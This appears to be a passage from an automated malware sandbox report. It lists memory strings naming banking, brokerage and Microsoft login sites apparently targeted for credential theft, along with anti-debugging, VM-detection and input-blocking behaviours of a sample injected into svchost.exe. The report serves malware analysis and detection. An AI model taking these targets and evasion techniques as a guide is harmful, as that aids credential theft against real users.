                Source: Ba4F6400.7.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                Source: Ba4F6400.7.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
                Source: Ba4F6400.7.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                Source: Ba4F6400.7.dr | Binary or memory string: tasks.office.comVMware20,11696497155o
                Source: Ba4F6400.7.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                Source: Ba4F6400.7.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                Source: firefox.exe, 0000000B.00000002.2011433482.000002062795D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: ROUTE.EXE, 00000007.00000002.3226358408.0000000002C5E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld
                Source: Ba4F6400.7.dr | Binary or memory string: bankofamerica.comVMware20,11696497155x
                Source: Ba4F6400.7.dr | Binary or memory string: ms.portal.azure.comVMware20,11696497155
                Source: Ba4F6400.7.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                Source: YLmLMhEKNXTfg.exe, 00000008.00000002.3227203579.0000000000C1F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu
                Source: Ba4F6400.7.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                Source: Ba4F6400.7.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                Source: Ba4F6400.7.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
                Source: Ba4F6400.7.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
                Source: Ba4F6400.7.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                Source: Ba4F6400.7.dr | Binary or memory string: interactivebrokers.comVMware20,11696497155
                Source: Ba4F6400.7.dr | Binary or memory string: AMC password management pageVMware20,11696497155
                Source: Ba4F6400.7.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                Source: Ba4F6400.7.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
                Source: Ba4F6400.7.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                Source: Ba4F6400.7.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
                Source: Ba4F6400.7.dr | Binary or memory string: discord.comVMware20,11696497155f
                Source: Ba4F6400.7.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
                Source: Ba4F6400.7.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                Source: Ba4F6400.7.dr | Binary or memory string: outlook.office365.comVMware20,11696497155t
                Source: Ba4F6400.7.dr | Binary or memory string: outlook.office.comVMware20,11696497155s
                Source: Ba4F6400.7.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
                Source: Ba4F6400.7.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                Source: Ba4F6400.7.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\ROUTE.EXE | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0347096E rdtsc 2_2_0347096E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004174A3 LdrLoadDll, 2_2_004174A3
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00D43F09 BlockInput, 0_2_00D43F09
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00CD3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00CD3B3A
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00D05A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00D05A7C
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_00CD4B37 LoadLibraryA,GetProcAddress, 0_2_00CD4B37
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_013C3500 mov eax, dword ptr fs:[00000030h] 0_2_013C3500
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_013C3560 mov eax, dword ptr fs:[00000030h] 0_2_013C3560
                Source: C:\Users\user\Desktop\gH3LlhcRzg.exe | Code function: 0_2_013C1E70 mov eax, dword ptr fs:[00000030h] 0_2_013C1E70
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h] 2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h] 2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h] 2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h] 2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h] 2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h] 2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h] 2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h] 2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h] 2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h] 2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h] 2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h] 2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h] 2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h] 2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h] 2_2_034B2349
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h] 2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h] 2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h] 2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B035C mov ecx, dword ptr fs:[00000030h] 2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h] 2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h] 2_2_034B035C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034FA352 mov eax, dword ptr fs:[00000030h] 2_2_034FA352
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034D8350 mov ecx, dword ptr fs:[00000030h] 2_2_034D8350
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0350634F mov eax, dword ptr fs:[00000030h] 2_2_0350634F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034D437C mov eax, dword ptr fs:[00000030h] 2_2_034D437C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h] 2_2_0346A30B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h] 2_2_0346A30B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h] 2_2_0346A30B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0342C310 mov ecx, dword ptr fs:[00000030h] 2_2_0342C310
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03450310 mov ecx, dword ptr fs:[00000030h] 2_2_03450310
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03508324 mov eax, dword ptr fs:[00000030h] 2_2_03508324
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03508324 mov ecx, dword ptr fs:[00000030h] 2_2_03508324
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03508324 mov eax, dword ptr fs:[00000030h] 2_2_03508324
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03508324 mov eax, dword ptr fs:[00000030h] 2_2_03508324
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034EC3CD mov eax, dword ptr fs:[00000030h] 2_2_034EC3CD
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0343A3C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h] 2_2_034383C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h] 2_2_034383C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h] 2_2_034383C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h] 2_2_034383C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B63C0 mov eax, dword ptr fs:[00000030h] 2_2_034B63C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h] 2_2_034DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h] 2_2_034DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034DE3DB mov ecx, dword ptr fs:[00000030h] 2_2_034DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h] 2_2_034DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h] 2_2_034D43D4
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h] 2_2_034D43D4
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h] 2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h] 2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h] 2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h] 2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h] 2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h] 2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h] 2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h] 2_2_034403E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0344E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0344E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0344E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034663FF mov eax, dword ptr fs:[00000030h] 2_2_034663FF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h] 2_2_0342E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]2_2_0345438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]2_2_0345438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov eax, dword ptr fs:[00000030h]2_2_034B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov ecx, dword ptr fs:[00000030h]2_2_034B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350625D mov eax, dword ptr fs:[00000030h]2_2_0350625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A250 mov eax, dword ptr fs:[00000030h]2_2_0342A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436259 mov eax, dword ptr fs:[00000030h]2_2_03436259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]2_2_034EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]2_2_034EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342826B mov eax, dword ptr fs:[00000030h]2_2_0342826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342823B mov eax, dword ptr fs:[00000030h]2_2_0342823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035062D6 mov eax, dword ptr fs:[00000030h]2_2_035062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]2_2_0346E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]2_2_0346E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]2_2_034402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]2_2_034402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov ecx, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov ecx, dword ptr fs:[00000030h]2_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C156 mov eax, dword ptr fs:[00000030h]2_2_0342C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C8158 mov eax, dword ptr fs:[00000030h]2_2_034C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]2_2_03436154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]2_2_03436154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]2_2_03504164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]2_2_03504164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov ecx, dword ptr fs:[00000030h]2_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F0115 mov eax, dword ptr fs:[00000030h]2_2_034F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460124 mov eax, dword ptr fs:[00000030h]2_2_03460124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035061E5 mov eax, dword ptr fs:[00000030h]2_2_035061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034601F8 mov eax, dword ptr fs:[00000030h]2_2_034601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03470185 mov eax, dword ptr fs:[00000030h]2_2_03470185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]2_2_034D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]2_2_034D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432050 mov eax, dword ptr fs:[00000030h]2_2_03432050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6050 mov eax, dword ptr fs:[00000030h]2_2_034B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345C073 mov eax, dword ptr fs:[00000030h]2_2_0345C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4000 mov ecx, dword ptr fs:[00000030h]2_2_034B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A020 mov eax, dword ptr fs:[00000030h]2_2_0342A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C020 mov eax, dword ptr fs:[00000030h]2_2_0342C020
